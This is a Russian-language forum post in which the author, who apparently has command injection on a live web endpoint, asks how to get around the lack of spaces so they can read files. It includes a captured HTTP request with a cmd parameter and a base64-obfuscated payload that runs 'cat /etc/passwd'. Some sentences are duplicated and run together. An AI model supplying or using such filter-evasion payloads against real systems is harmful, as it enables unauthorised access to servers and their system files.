Привет всем. Подскажите пожалуйста, что делать, если есть возможность выполнять линуксовые команды, но нет возможности поставить пробел в команде?
Запрос выглядит так:
Команды по типу ls, pwd, whoami, id и прочее отрабатываются.
Но мне нужна возможность прочитать файл с директории. В этой команде есть пробел, в параметр оно неверно передается уже.
Может финт с енкодом в б64 провернуть, но там тоже есть проблелы.
UPD:
если через браузер закидывать, то можно с кавычками передать и всё норм передаётся, но есть проблема, что команда cat /etc/passwd прверащается в cat%20/etc/passwd, ну и само собой такой команды нет...)
Запрос выглядит так:
Код:
GET /script_name?cmd=ls HTTP/2
Host: *****************
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailersНо мне нужна возможность прочитать файл с директории. В этой команде есть пробел, в параметр оно неверно передается уже.
Может финт с енкодом в б64 провернуть, но там тоже есть проблелы.
bash -c $(echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d)UPD:
если через браузер закидывать, то можно с кавычками передать и всё норм передаётся, но есть проблема, что команда cat /etc/passwd прверащается в cat%20/etc/passwd, ну и само собой такой команды нет...)
Последнее редактирование:
